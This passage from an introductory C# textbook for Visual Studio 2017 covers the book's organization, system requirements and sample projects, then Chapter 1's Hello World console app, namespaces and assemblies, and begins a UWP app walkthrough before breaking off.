with natural-language speech analysis, enabling your apps to respond to
Cortana’s requests is surprisingly easy; I cover this in Chapter 26. Also, the
cloud has become such an important element in the architecture of many
systems—ranging from large-scale enterprise applications to mobile apps
running on portable devices—that I decided to focus on this aspect of
development in the final chapter of the book.
The development environment provided by Visual Studio 2017 makes
these features easy to use, and the many new wizards and enhancements
included in the latest version of Visual Studio can greatly improve your
productivity as a developer. I hope you have as much fun working through
this book as I had writing it!
Download from finelybook [email protected]
28
Who should read this book
This book assumes that you are a developer who wants to learn the
fundamentals of programming with C# by using Visual Studio 2017 and the
.NET Framework version 4.6.1. By the time you complete this book, you will
have a thorough understanding of C# and will have used it to build
responsive and scalable applications that can run on the Windows 10
operating system.
Who should not read this book
This book is aimed at developers new to C# but not completely new to
programming. As such, it concentrates primarily on the C# language. This
book is not intended to provide detailed coverage of the multitude of
technologies available for building enterprise-level and global applications
for Windows, such as ADO.NET, ASP.NET, Azure, or Windows
Communication Foundation. If you require more information on any of these
items, you might consider reading some of the other titles available from
Microsoft Press.
Organization of this book
This book is divided into four sections:
Part I, “Introducing Microsoft Visual C# and Microsoft Visual Studio
2017,” provides an introduction to the core syntax of the C# language
and the Visual Studio programming environment.
Part II, “Understanding the C# object model,” goes into detail on how
to create and manage new types in C# and how to manage the
resources referenced by these types.
Part III, “Defining extensible types with C#,” includes extended
coverage of the elements that C# provides for building types that you
can reuse across multiple applications.
Part IV, “Building Universal Windows Platform applications with C#,”
describes the universal Windows 10 programming model and how you
Download from finelybook [email protected]
29
can use C# to build interactive applications for this model.
Finding your best starting point in this book
This book is designed to help you build skills in a number of essential areas.
You can use this book if you are new to programming or if you are switching
from another programming language such as C, C++, Java, or Visual Basic.
Use the following table to find your best starting point.
If you are
Follow these steps
New to object-oriented
programming
1. Install the practice files as described in the
upcoming section, “Code samples.”
2. Work through the chapters in Parts I, II, and
III sequentially.
3. Complete Part IV as your level of
experience and interest dictates.
Familiar with procedural
programming languages,
such as C, but new to C#
1. Install the practice files as described in the
upcoming section, “Code samples.”
2. Skim the first five chapters to get an
overview of C# and Visual Studio 2017, and
then concentrate on Chapters 6 through 22.
3. Complete Part IV as your level of
experience and interest dictates.
Migrating from an
object-oriented language
such as C++ or Java
1. Install the practice files as described in the
upcoming section, “Code samples.”
2. Skim the first seven chapters to get an
overview of C# and Visual Studio 2017, and
then concentrate on Chapters 8 through 22.
3. For information about building Universal
Windows Platform applications, read Part
IV.
Switching from Visual
Basic to C#
1. Install the practice files as described in the
upcoming section, “Code samples.”
Download from finelybook [email protected]
30
2. Work through the chapters in Parts I, II, and
III sequentially.
3. For information about building Universal
Windows Platform applications, read Part
IV.
4. Read the Quick Reference sections at the
end of the chapters for information about
specific C# and Visual Studio 2017
constructs.
Referencing the book
after working through the
exercises
1. Use the index or the table of contents to find
information about particular subjects.
2. Read the Quick Reference sections at the
end of each chapter to find a brief review of
the syntax and techniques presented in the
chapter.
Most of the book’s chapters include hands-on samples that let you try out
the concepts you just learned. No matter which sections you choose to focus
on, be sure to download and install the sample applications on your system.
Conventions and features in this book
This book presents information by using conventions designed to make the
information readable and easy to follow.
Each exercise consists of a series of tasks, presented as numbered steps
(1, 2, and so on) listing each action you must take to complete the
exercise.
Boxed elements with labels such as “Note” provide additional
information or alternative methods for completing a step successfully.
Text that you type (apart from code blocks) appears in bold.
A plus sign (+) between two key names means that you must press
those keys at the same time. For example, “Press Alt+Tab” means that
you hold down the Alt key while you press the Tab key.
Download from finelybook [email protected]
31
System requirements
You will need the following hardware and software to complete the practice
exercises in this book:
Windows 10 (Home, Professional, Education, or Enterprise) version
1507 or higher.
The most recent build of Visual Studio Community 2017, Visual
Studio Professional 2017, or Visual Studio Enterprise 2017 (make sure
that you have installed any updates). As a minimum, you should select
the following workloads when installing Visual Studio 2017:
• Universal Windows Platform development
• .NET desktop development
• ASP.NET and web development
• Azure development
• Data storage and processing
• .NET Core cross-platform development
Note All the exercises and code samples in this book have been
developed and tested using Visual Studio Community 2017. They
should all work, unchanged, in Visual Studio Professional 2017 and
Visual Studio Enterprise 2017.
A computer that has a 1.8 GHz or faster processor (dual-core or better
recommended)
2 GB RAM (4 GB RAM recommended, add 512 MB if running in a
virtual machine)
10 GB of available hard disk space after installing Visual Studio
5400 RPM hard-disk drive (SSD recommended)
A video card that supports a 1024 × 768 or higher resolution display
Download from finelybook [email protected]
32
Internet connection to download software or chapter examples
Depending on your Windows configuration, you might require local
Administrator rights to install or configure Visual Studio 2017.
You also need to enable developer mode on your computer to be able to
create and run UWP apps. For details on how to do this, see “Enable Your
Device for Development,” at
https://msdn.microsoft.com/library/windows/apps/dn706236.aspx.
Code samples
Most of the chapters in this book include exercises with which you can
interactively try out new material learned in the main text. You can download
all the sample projects, in both their pre-exercise and post-exercise formats,
from the following page:
https://aka.ms/VisCSharp9e/downloads
Note In addition to the code samples, your system should have Visual
Studio 2017 installed. If available, install the latest service packs for
Windows and Visual Studio.
Installing the code samples
Follow these steps to install the code samples on your computer so that you
can use them with the exercises in this book:
1. Unzip the CSharpSBS.zip file that you downloaded from the book’s
website, extracting the files into your Documents folder.
2. If prompted, review the end-user license agreement. If you accept the
terms, select the Accept option and then click Next.
Download from finelybook [email protected]
33
Note If the license agreement doesn’t appear, you can access it from the
same webpage from which you downloaded the CSharpSBS.zip file.
Using the code samples
Each chapter in this book explains when and how to use the code samples for
that chapter. When it’s time to use a code sample, the book will list the
instructions for how to open the files.
Important Many of the code samples depend on NuGet packages that
are not included with the code. These packages are downloaded
automatically the first time you build a project. As a result, if you open
a project and examine the code before doing a build, Visual Studio
might report a large number of errors for unresolved references.
Building the project will resolve these references, and the errors should
disappear.
For those of you who like to know all the details, here’s a list of the
sample Visual Studio 2017 projects and solutions, grouped by the folders in
which you can find them. In many cases, the exercises provide starter files
and completed versions of the same projects that you can use as a reference.
The completed projects for each chapter are stored in folders with the suffix
“- Complete.”
Project/Solution
Description
Chapter 1
TextHello
This project gets you started. It steps through
the creation of a simple program that displays
a text-based greeting.
Download from finelybook [email protected]
34
Hello
This project opens a window that prompts the
user for his or her name and then displays a
greeting.
Chapter 2
PrimitiveDataTypes
This project demonstrates how to declare
variables by using each of the primitive types,
how to assign values to these variables, and
how to display their values in a window.
MathsOperators
This program introduces the arithmetic
operators (+ – * / %).
Chapter 3
Methods
In this project, you’ll reexamine the code in
the MathsOperators project and investigate
how it uses methods to structure the code.
DailyRate
This project walks you through writing your
own methods, running the methods, and
stepping through the method calls by using
the Visual Studio 2015 debugger.
DailyRate Using
Optional Parameters
This project shows you how to define a
method that takes optional parameters and
call the method by using named arguments.
Chapter 4
Selection
This project shows you how to use a
cascading if statement to implement complex
logic, such as comparing the equivalence of
two dates.
SwitchStatement
This simple program uses a switch statement
to convert characters into their XML
representations.
Chapter 5
WhileStatement
This project demonstrates a while statement
that reads the contents of a source file one
line at a time and displays each line in a text
box on a form.
DoStatement
This project uses a do statement to convert a
Download from finelybook [email protected]
35
decimal number to its octal representation.
Chapter 6
MathsOperators
This project revisits the MathsOperators
project from Chapter 2 and shows how
various unhandled exceptions can make the
program fail. The try and catch keywords
then make the application more robust so that
it no longer fails.
Chapter 7
Classes
This project covers the basics of defining
your own classes, complete with public
constructors, methods, and private fields. It
also shows how to create class instances by
using the new keyword and how to define
static methods and fields.
Chapter 8
Parameters
This program investigates the difference
between value parameters and reference
parameters. It demonstrates how to use the ref
and out keywords.
Chapter 9
StructsAndEnums
This project defines a struct type to represent
a calendar date.
Chapter 10
Cards
This project shows how to use arrays to
model hands of cards in a card game.
Chapter 11
ParamsArray
This project demonstrates how to use the
params keyword to create a single method
that can accept any number of int arguments.
Chapter 12
Vehicles
This project creates a simple hierarchy of
vehicle classes by using inheritance. It also
demonstrates how to define a virtual method.
ExtensionMethod
This project shows how to create an extension
Download from finelybook [email protected]
36
method for the int type, providing a method
that converts an integer value from base 10 to
a different number base.
Chapter 13
Drawing
This project implements part of a graphical
drawing package. The project uses interfaces
to define the methods that drawing shapes
expose and implement.
Chapter 14
GarbageCollectionDemo This project shows how to implement
exception-safe disposal of resources by using
the Dispose pattern.
Chapter 15
Drawing Using
Properties
This project extends the application in the
Drawing project developed in Chapter 13 to
encapsulate data in a class by using
properties.
AutomaticProperties
This project shows how to create automatic
properties for a class and use them to
initialize instances of the class.
Chapter 16
Indexers
This project uses two indexers: one to look up
a person’s phone number when given a name
and the other to look up a person’s name
when given a phone number.
Chapter 17
BinaryTree
This solution shows you how to use generics
to build a type-safe structure that can contain
elements of any type.
BuildTree
This project demonstrates how to use generics
to implement a type-safe method that can take
parameters of any type.
Chapter 18
Cards
This project updates the code from Chapter
10 to show how to use collections to model
Download from finelybook [email protected]
37
hands of cards in a card game.
Chapter 19
BinaryTree
This project shows you how to implement the
generic IEnumerator<T> interface to create
an enumerator for the generic Tree class.
IteratorBinaryTree
This solution uses an iterator to generate an
enumerator for the generic Tree class.
Chapter 20
Delegates
This project shows how to decouple a method
from the application logic that invokes it by
using a delegate. The project is then extended
to show how to use an event to alert an object
to a significant occurrence, and how to catch
an event and perform any processing
required.
Chapter 21
QueryBinaryTree
This project shows how to use LINQ queries
to retrieve data from a binary tree object.
Chapter 22
ComplexNumbers
This project defines a new type that models
complex numbers and implements common
operators for this type.
Chapter 23
GraphDemo
This project generates and displays a complex
graph on a UWP form. It uses a single thread
to perform the calculations.
Parallel GraphDemo
This version of the GraphDemo project uses
the Parallel class to abstract out the process
of creating and managing tasks.
GraphDemo With
Cancellation
This project shows how to implement
cancellation to halt tasks in a controlled
manner before they have completed.
ParallelLoop
This application provides an example
showing when you should not use the
Parallel class to create and run tasks.
Download from finelybook [email protected]
38
Chapter 24
GraphDemo
This is a version of the GraphDemo project
from Chapter 23 that uses the async keyword
and the await operator to perform the
calculations that generate the graph data
asynchronously.
PLINQ
This project shows some examples of using
PLINQ to query data by using parallel tasks.
CalculatePI
This project uses a statistical sampling
algorithm to calculate an approximation for
pi. It uses parallel tasks.
Chapter 25
Customers
This project implements a scalable user
interface that can adapt to different device
layouts and form factors. The user interface
applies XAML styling to change the fonts
and background image displayed by the
application.
Chapter 26
DataBinding
This is a version of the Customers project that
uses data binding to display customer
information retrieved from a data source in
the user interface. It also shows how to
implement the INotifyPropertyChanged
interface so that the user interface can update
customer information and send these changes
back to the data source.
ViewModel
This version of the Customers project
separates the user interface from the logic that
accesses the data source by implementing the
Model-View-ViewModel pattern.
Cortana
This project integrates the Customers app
with Cortana. A user can issue voice
commands to search for customers by name.
Download from finelybook [email protected]
39
Chapter 27
Web Service
This solution includes a web application that
provides an ASP.NET Web API web service
that the Customers application uses to retrieve
customer data from a SQL Server database.
The web service uses an entity model created
with the Entity Framework to access the
database.
Errata and book support
We’ve made every effort to ensure the accuracy of this book and its
companion content. Any errors that have been reported since this book was
published are listed on our Microsoft Press site at:
https://aka.ms/VisCSharp9e/errata
If you find an error that is not already listed, you can report it to us
through the same page.
If you need additional support, email Microsoft Press Book Support at
[email protected].
Please note that product support for Microsoft software and hardware is
not offered through the previous addresses. For help with Microsoft software
or hardware, go to https://support.microsoft.com.
Stay in touch
Let’s keep the conversation going! We’re on Twitter:
http://twitter.com/MicrosoftPress
Download from finelybook [email protected]
40
PART I
Introducing Microsoft Visual C#
and Microsoft Visual Studio 2017
This introductory part of the book covers the essentials of the C# language
and shows you how to get started building applications with Visual Studio
2017.
In Part I, you’ll learn how to create new projects in Visual Studio and how
to declare variables, use operators to create values, call methods, and write
many of the statements you need when implementing C# programs. You’ll
also learn how to handle exceptions and how to use the Visual Studio
debugger to step through your code and spot problems that prevent your
applications from working correctly.
Download from finelybook [email protected]
41
CHAPTER 1
Welcome to C#
After completing this chapter, you will be able to:
Use the Microsoft Visual Studio 2017 programming environment.
Create a C# console application.
Explain the purpose of namespaces.
Create a simple graphical C# application.
This chapter introduces Visual Studio 2017, the programming environment
and toolset designed to help you build applications for Microsoft Windows.
Visual Studio 2017 is the ideal tool for writing C# code, and it provides many
features that you will learn about as you progress through this book. In this
chapter, you will use Visual Studio 2017 to build some simple C#
applications and get started on the path to building highly functional solutions
for Windows.
Beginning programming with the Visual Studio 2017
environment
Visual Studio 2017 is a tool-rich programming environment containing the
functionality that you need to create large or small C# projects running on
Windows. You can even construct projects that seamlessly combine modules
written in different programming languages, such as C++, Visual Basic, and
F#. In the first exercise, you will open the Visual Studio 2017 programming
Download from finelybook [email protected]
42
environment and learn how to create a console application.
Note A console application is an application that runs in a Command
Prompt window instead of providing a graphical user interface (GUI).
Create a console application in Visual Studio 2017
1. On the Windows taskbar, click Start, type Visual Studio 2017, and then
press Enter. Alternatively, you can click the Visual Studio 2017 icon on
the Start menu.
Visual Studio 2017 starts and displays the Start page, similar to the
following. (Your Start page might be different, depending on the edition
of Visual Studio 2017 you are using.)
2. On the File menu, point to New, and then click Project.
Download from finelybook [email protected]
43
The New Project dialog box opens. This dialog box lists the templates
that you can use as a starting point for building an application. The
dialog box categorizes templates according to the programming
language you are using and the type of application.
3. In the left pane, expand the Installed node (if it is not already expanded),
and then click Visual C#. In the middle pane, verify that the combo box
at the top of the pane displays .NET Framework 4.6.1, and then click
Console App (.NET Framework).
Note Make sure that you select Console App (.NET Framework)
and not Console App (.NET Core). You use the .NET Core
template for building portable applications that can also run on
other operating systems, such as Linux. However, .NET Core
applications do not provide the range of features available to the
complete .NET Framework.
Download from finelybook [email protected]
44
4. In the Location box, type C:\Users\YourName\Documents\Microsoft
Press\VCSBS\ Chapter 1. Replace the text YourName in this path with
your Windows username.
Note To avoid repetition and save space, throughout the rest of this
book I will refer to the path C:\Users\YourName\Documents
simply as your Documents folder.
Tip If the folder you specify does not exist, Visual Studio 2017
creates it for you.
Download from finelybook [email protected]
45
5. In the Name box, type TestHello (type over the existing name,
ConsoleApplication1).
6. Ensure that the Create Directory For Solution check box is selected and
that the Add To Source Control check box is clear, and then click OK.
Visual Studio creates the project by using the Console Application
template. Visual Studio then displays the starter code for the project, like this:
The menu bar at the top of the screen provides access to the features
you’ll use in the programming environment. You can use the keyboard or
mouse to access the menus and commands, exactly as you can in all
Windows-based programs. The toolbar is located beneath the menu bar. It
provides button shortcuts to run the most frequently used commands.
The Code and Text Editor window, occupying the main part of the screen,
displays the contents of source files. In a multifile project, when you edit
more than one file, each source file has its own tab labeled with the name of
Download from finelybook [email protected]
46
the source file. You can click the tab to bring the named source file to the
foreground in the Code and Text Editor window.
The Solution Explorer pane appears on the right side of the IDE, adjacent
to the Code and Text Editor window:
Solution Explorer displays the names of the files associated with the
project, among other items. You can also double-click a file name in Solution
Explorer to bring that source file to the foreground in the Code and Text
Editor window.
Before writing any code, examine the files listed in Solution Explorer,
which Visual Studio 2017 has created as part of your project:
Solution ‘TestHello’ This is the top-level solution file. Each
application contains a single solution file. A solution can contain one
or more projects, and Visual Studio 2017 creates the solution file to
help organize these projects. If you use File Explorer to look at your
Documents\Microsoft Press\VCSBS\Chapter 1\TestHello folder, you’ll
see that the actual name of this file is TestHello.sln.
Download from finelybook [email protected]
47
TestHello This is the C# project file. Each project file references one
or more files containing the source code and other artifacts for the
project, such as graphics images. You must write all the source code in
a single project in the same programming language. In File Explorer,
this file is actually called TestHello.csproj, and it is stored in the
\Microsoft Press\VCSBS\Chapter 1\ TestHello\TestHello folder in your
Documents folder.
Properties This is a folder in the TestHello project. If you expand it
(click the arrow next to Properties), you will see that it contains a file
called AssemblyInfo.cs. AssemblyInfo.cs is a special file that you can
use to add attributes to a program, such as the name of the author, the
date the program was written, and so on. You can specify additional
attributes to modify the way in which the program runs. Explaining
how to use these attributes is beyond the scope of this book.
References This folder contains references to libraries of compiled
code that your application can use. When your C# code is compiled, it
is converted into a library and given a unique name. In the Microsoft
.NET Framework, these libraries are called assemblies. Developers use
assemblies to package useful functionality that they have written so
that they can distribute it to other developers who might want to use
these features in their own applications. If you expand the References
folder, you will see the default set of references that Visual Studio
2017 adds to your project. These assemblies provide access to many of
the commonly used features of the .NET Framework and are provided
by Microsoft with Visual Studio 2017. You will learn about many of
these assemblies as you progress through the exercises in this book.
App.config This is the application configuration file. It is optional,
and it might not always be present. You can specify settings that your
application uses at run time to modify its behavior, such as the version
of the .NET Framework to use to run the application. You will learn
more about this file in later chapters of this book.
Program.cs This is a C# source file, and it is displayed in the Code
and Text Editor window when the project is first created. You will
write your code for the console application in this file. It also contains
some code that Visual Studio 2017 provides automatically, which you
will examine shortly.
Download from finelybook [email protected]
48
Writing your first program
The Program.cs file defines a class called Program that contains a method
called Main. In C#, all executable code must be defined within a method, and
all methods must belong to a class or a struct. You will learn more about
classes in Chapter 7, “Creating and managing classes and objects,” and you
will learn about structs in Chapter 9, “Creating value types with enumerations
and structures.”
The Main method designates the program’s entry point. This method
should be defined in the manner specified in the Program class as a static
method; otherwise, the .NET Framework might not recognize it as the
starting point for your application when you run it. (You will look at methods
in detail in Chapter 3, “Writing methods and applying scope,” and Chapter 7
provides more information on static methods.)
Important C# is a case-sensitive language. You must spell Main with
an uppercase M.
In the following exercises, you write the code to display the message
“Hello World!” to the console window, build and run your Hello World
console application, and learn how namespaces are used to partition code
elements.
Write the code by using Microsoft IntelliSense
1. In the Code and Text Editor window displaying the Program.cs file,
place the cursor in the Main method, immediately after the opening
curly brace ( { ), and then press Enter to create a new line.
2. On the new line, type the word Console; this is the name of another
class provided by the assemblies referenced by your application. It
provides methods for displaying messages in the console window and
reading input from the keyboard.
As you type the letter C at the start of the word Console, an IntelliSense
Download from finelybook [email protected]
49
list appears. This list contains all of the C# keywords and data types that
are valid in this context. You can either continue typing or scroll through
the list and double-click the Console item with the mouse. Alternatively,
after you have typed Cons, the IntelliSense list automatically homes in
on the Console item, and you can press the Tab or Enter key to select it.
Main should look like this:
Click here to view code image
static void Main(string[] args)
{
Console
}
Note Console is a built-in class.
3. Type a period immediately following Console.
Another IntelliSense list appears, displaying the methods, properties,
and fields of the Console class.
Download from finelybook [email protected]
50
4. Scroll down through the list, select WriteLine, and then press Enter.
Alternatively, you can continue typing the characters W, r, i, t, e, L until
WriteLine is selected, and then press Enter.
The IntelliSense list closes, and the word WriteLine is added to the
source file. Main should now look like this:
Click here to view code image
static void Main(string[] args)
{
Console.WriteLine
}
5. Type ( and another IntelliSense tip will appear.
This tip displays the parameters that the WriteLine method can take. In
fact, WriteLine is an overloaded method, meaning that the Console class
contains more than one method named WriteLine—it provides 19
different versions of this method. You can use each version of the
WriteLine method to output different types of data. (Chapter 3 describes
overloaded methods in more detail.) Main should now look like this:
Click here to view code image
static void Main(string[] args)
{
Console.WriteLine(
}
Tip You can click the up and down arrows in the tip to scroll
through the different overloads of WriteLine.
6. Type ); and Main should now look like this:
Click here to view code image
static void Main(string[] args)
{
Console.WriteLine();
}
Download from finelybook [email protected]
51
7. Move the cursor and type the string, “Hello World!” (including the
quotation marks) between the left and right parentheses following the
WriteLine method.
Main should now look like this:
Click here to view code image
static void Main(string[] args)
{
Console.WriteLine("Hello World!");
}
Tip Get into the habit of typing matched character pairs, such as
parentheses—( and )—and curly brackets—{ and }—before filling in
their contents. It’s easy to forget the closing character if you wait until
after you’ve entered the contents.
IntelliSense icons
When you type a period after the name of a class, IntelliSense displays
the name of every member of that class. To the left of each member
name is an icon that depicts the type of member. Common icons and
their types include the following:
Icon Meaning
Method (discussed in Chapter 3)
Property (discussed in Chapter 15, “Implementing properties to
access fields”)
Class (discussed in Chapter 7)
Struct (discussed in Chapter 9)
Enum (discussed in Chapter 9)
Extension method (discussed in Chapter 12, “Working with
Download from finelybook [email protected]
52
Inheritance”)
Interface (discussed in Chapter 13, “Creating interfaces and
defining abstract classes”)
Delegate (discussed in Chapter 17, “Introducing generics”)
Event (discussed in Chapter 17)
Namespace (discussed in the next section of this chapter)
You will also see other IntelliSense icons appear as you type code in
different contexts.
You will frequently see lines of code containing two forward slashes (//)
followed by ordinary text. These are comments, which are ignored by the
compiler but are very useful for developers because they help document what
a program is actually doing. Take, for instance, the following example:
Click here to view code image
Console.ReadLine(); // Wait for the user to press the Enter key
The compiler skips all text from the two slashes to the end of the line. You
can also add multiline comments that start with a forward slash followed by
an asterisk (/*). The compiler skips everything until it finds an asterisk
followed by a forward slash sequence (*/), which could be many lines further
down. You are actively encouraged to document your code with as many
meaningful comments as necessary.
Build and run the console application
1. On the Build menu, click Build Solution.
This action compiles the C# code, resulting in a program that you can
run. The Output window appears below the Code and Text Editor
window.
Tip If the Output window does not appear, click Output on the
Download from finelybook [email protected]
53
View menu to display it.
In the Output window, you should see messages similar to the following,
indicating how the program is being compiled:
Click here to view code image
1>------ Build started: Project: TestHello, Configuration: Debug
Any CPU ------
1> TestHello -> C:\Users\John\Documents\Microsoft Press\Visual
CSharp Step By Step\Chapter
1\TestHello\TestHello\bin\Debug\TestHello.exe
========== Build: 1 succeeded, 0 failed, 0 up-to-date, 0 skipped
==========
If you have made any mistakes, they will be reported in the Error List
window. The following image shows what happens if you forget to type
the closing quotation marks after the text Hello World in the WriteLine
statement. Notice that a single mistake can sometimes cause multiple
compiler errors.
Download from finelybook [email protected]
54
Tip To go directly to the line that caused the error, you can double-
click an item in the Error List window. You should also notice that
Visual Studio displays a wavy red line under any lines of code that
will not compile when you enter them.
If you have followed the previous instructions carefully, there should be
no errors or warnings, and the program should build successfully.
Download from finelybook [email protected]
55
Tip There is no need to save the file explicitly before building
because the Build Solution command automatically saves it. An
asterisk after the file name in the tab above the Code and Text
Editor window indicates that the file has been changed since it was
last saved.
2. On the Debug menu, click Start Without Debugging.
A command window opens, and the program runs. The message “Hello
World!” appears. The program now waits for you to press any key, as
shown in the following graphic:
Note The “Press any key to continue” prompt is generated by
Visual Studio; you did not write any code to do this. If you run the
program by using the Start Debugging command on the Debug
menu, the application runs, but the command window closes
immediately without waiting for you to press a key.
3. Ensure that the command window displaying the program’s output has
the focus (meaning that it’s the window that’s currently active), and then
press Enter.
The command window closes, and you return to the Visual Studio 2017
programming environment.
Download from finelybook [email protected]
56
4. In Solution Explorer, click the TestHello project (not the solution), and
then, on the Solution Explorer toolbar, click the Show All Files button.
Be aware that you might need to click the double-arrow button on the
right edge of the Solution Explorer toolbar to make this button appear.
Entries named bin and obj appear above the Program.cs file. These
entries correspond directly to folders named bin and obj in the project
folder (Microsoft Press\VCSBS\Chapter 1\TestHello\TestHello). Visual
Studio creates these folders when you build your application; they
contain the executable version of the program together with some other
files used to build and debug the application.
5. In Solution Explorer, expand the bin entry.
Another folder named Debug appears.
Note You might also see a folder named Release.
Download from finelybook [email protected]
57
6. In Solution Explorer, expand the Debug folder.
Several more items appear, including a file named TestHello.exe. This is
the compiled program, which is the file that runs when you click Start
Without Debugging on the Debug menu. The other files contain
information that is used by Visual Studio 2017 if you run your program
in debug mode (when you click Start Debugging on the Debug menu).
Using namespaces
The example you have seen so far is a very small program. However, small
programs can soon grow into much bigger programs. As a program grows,
two issues arise. First, it is harder to understand and maintain big programs
than it is to understand and maintain smaller ones. Second, more code usually
means more classes, with more methods, requiring you to keep track of more
names. As the number of names increases, so does the likelihood of the
project build failing because two or more names clash. For example, you
might try to create two classes with the same name. The situation becomes
more complicated when a program references assemblies written by other
developers who have also used a variety of names.
In the past, programmers tried to solve the name-clashing problem by
prefixing names with some sort of qualifier (or set of qualifiers). Using
prefixes as qualifiers is not a good solution because it’s not scalable. Names
become longer, you spend less time writing software and more time typing
(there is a difference), and you spend too much time reading and rereading
incomprehensibly long names.
Namespaces help solve this problem by creating a container for items such
as classes. Two classes with the same name will not be confused with each
other if they live in different namespaces. You can create a class named
Greeting inside the namespace named TestHello by using the namespace
keyword like this:
Click here to view code image
namespace TestHello
{
class Greeting
{
Download from finelybook [email protected]
58
...
}
}
You can then refer to the Greeting class as TestHello.Greeting in your
programs. If another developer also creates a Greeting class in a different
namespace, such as NewNamespace, and you install the assembly that
contains this class on your computer, your programs will still work as
expected because they are using your TestHello.Greeting class. If you want to
refer to the other developer’s Greeting class, you must specify it as
NewNamespace.Greeting.
It is good practice to define all your classes in namespaces, and the Visual
Studio 2017 environment follows this recommendation by using the name of
your project as the top-level namespace. The .NET Framework class library
also adheres to this recommendation; every class in the .NET Framework
lives within a namespace. For example, the Console class lives within the
System namespace. This means that its full name is actually System.Console.
Of course, if you had to write the full name of a class every time you used
it, the situation would be no better than prefixing qualifiers or even just
naming the class with some globally unique name such as SystemConsole.
Fortunately, you can solve this problem with a using directive in your
programs. If you return to the TestHello program in Visual Studio 2017 and
look at the file Program.cs in the Code and Text Editor window, you will
notice the following lines at the top of the file:
Click here to view code image
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
These lines are using directives. A using directive brings a namespace into
scope. In the subsequent code in the same file, you no longer need to
explicitly qualify objects with the namespace to which they belong. The five
namespaces shown contain classes that are used so often that Visual Studio
2017 automatically adds these using directives every time you create a new
project. You can add more using directives to the top of a source file if you
need to reference other namespaces.
Download from finelybook [email protected]
59
Note You might notice that some of the using directives appear grayed-
out. These directives correspond to namespaces that are not currently
used by your application. If you don’t need them when you have
finished writing your code, you can safely delete them. However, if you
require items that are held in these namespaces later, you will have to
add the using directives back in again.
The following exercise demonstrates the concept of namespaces in more
depth.
Try longhand names
1. In the Code and Text Editor window displaying the Program.cs file,
comment out the first using directive at the top of the file, like this:
//using System;
2. On the Build menu, click Build Solution.
The build fails, and the Error List window displays the following error
message:
Click here to view code image
The name 'Console' does not exist in the current
context.
3. In the Error List window, double-click the error message.
The identifier that caused the error is highlighted in the Program.cs
source file with a red squiggle.
4. In the Code and Text Editor window, edit the Main method to use the
fully qualified name System.Console.
Main should look like this:
Click here to view code image
Download from finelybook [email protected]
60
static void Main(string[] args)
{
System.Console.WriteLine("Hello World!");
}
Note When you type the period after System, IntelliSense displays
the names of all the items in the System namespace.
5. On the Build menu, click Build Solution.
The project should build successfully this time. If it doesn’t, ensure that
Main is exactly as it appears in the preceding code, and then try building
again.
6. Run the application to be sure that it still works by clicking Start
Without Debugging on the Debug menu.
7. When the program runs and displays “Hello World!” in the console
window, press Enter to return to Visual Studio 2017.
Namespaces and assemblies
A using directive simply brings the items in a namespace into scope and
frees you from having to fully qualify the names of classes in your code.
Classes are compiled into assemblies. An assembly is a file that usually
has the .dll file name extension, although strictly speaking, executable
programs with the .exe file name extension are also assemblies.
An assembly can contain many classes. The classes that the .NET
Framework class library includes, such as System.Console, are provided
in assemblies that are installed on your computer together with Visual
Studio. You will find that the .NET Framework class library contains
thousands of classes. If they were all held in the same assembly, the
assembly would be huge and difficult to maintain. (If Microsoft were to
update a single method in a single class, it would have to distribute the
Download from finelybook [email protected]
61
entire class library to all developers!)
For this reason, the .NET Framework class library is split into a
number of assemblies, partitioned by the functions that they perform or
the technology that they implement. For example, a “core” assembly
(actually called mscorlib.dll) contains all the common classes, such as
System.Console, and other assemblies contain classes for manipulating
databases, accessing web services, building GUIs, and so on. If you
want to make use of a class in an assembly, you must add a reference to
that assembly to your project. You can then add using directives to your
code that bring the items in namespaces in that assembly into scope.
You should note that there is not necessarily a 1:1 equivalence
between an assembly and a namespace: A single assembly can contain
classes defined in many namespaces, and a single namespace can span
multiple assemblies. For example, the classes and items in the System
namespace are actually implemented by several assemblies, including
mscorlib.dll, System.dll, and System.Core.dll, among others. This all
sounds very confusing at first, but you will soon get used to it.When
you use Visual Studio to create an application, the template you select
automatically includes references to the appropriate assemblies. For
example, in Solution Explorer for the TestHello project, expand the
References folder. You will see that a console application automatically
contains references to assemblies called Microsoft.CSharp, System,
System.Core, System.Data, System.Data.DataSetExtensions,
System.Net.Http, System.Xml, and System.Xml.Linq. You might be
surprised to see that mscorlib.dll is not included in this list. The reason
for this is that all .NET Framework applications must use this assembly
because it contains fundamental runtime functionality. The References
folder lists only the optional assemblies; you can add or remove
assemblies from this folder as necessary.
To add references for additional assemblies to a project, right-click
the References folder and then click Add Reference. You will perform
this task in later exercises. You can remove an assembly by right-
clicking the assembly in the References folder and then clicking
Remove.
Download from finelybook [email protected]
62
Creating a graphical application
So far, you have used Visual Studio 2017 to create and run a basic console
application. The Visual Studio 2017 programming environment also contains
everything you need to create graphical applications for Windows 10. These
templates are referred to as Universal Windows Platform (UWP) apps
because they enable you to create apps that function on any device that runs
Windows, such as desktop computers, tablets, and phones. You can design
the user interface (UI) of a Windows application interactively. Visual Studio
2017 then generates the program statements to implement the user interface
you’ve designed.
Visual Studio 2017 provides you with two views of a graphical
application: the design view and the code view. You use the Code and Text
Editor window to modify and maintain the code and program logic for a
graphical application, and you use the Design View window to lay out your
UI. You can switch between the two views whenever you want.
In the following set of exercises, you’ll learn how to create a graphical
application by using Visual Studio 2017. This program displays a simple
form containing a text box where you can enter your name and a button that
when clicked displays a personalized greeting in a message box.
If you want more information about the specifics of writing UWP apps,
the final few chapters in Part IV of this book provide more detail and
guidance.
Create a graphical application in Visual Studio 2017
1. Start Visual Studio 2017 if it is not already running.
2. On the File menu, point to New, and then click Project.
The New Project dialog box opens.
3. In the left pane, expand the Installed node (if it is not already expanded),
expand Visual C#, and then click Windows Universal.
4. In the middle pane, click the Blank App (Universal Windows) icon.
5. Ensure that the Location field refers to the \Microsoft
Press\VCSBS\Chapter 1 folder in your Documents folder.
Download from finelybook [email protected]
63
6. In the Name box, type Hello.
7. Ensure that the Create Directory For Solution check box is selected, and
then click OK.
8. At this point, you will be prompted with a dialog box asking you to
specify on which builds of Windows 10 your application is going to run.
Later builds of Windows 10 have more and newer features available.
Microsoft recommends that you always select the latest build of
Windows 10 as the target version, but if you are developing enterprise
applications that also need to run on older versions then select the oldest
version of Windows 10 that users are using as the minimum version.
However, do not automatically select the oldest version of Windows 10
as this might restrict some of the functionality available to your
application:
If this is the first time that you have created a UWP application, you
might also be prompted to enable developer mode for Windows 10, and
the Windows 10 settings screen will appear. Select Developer Mode. A
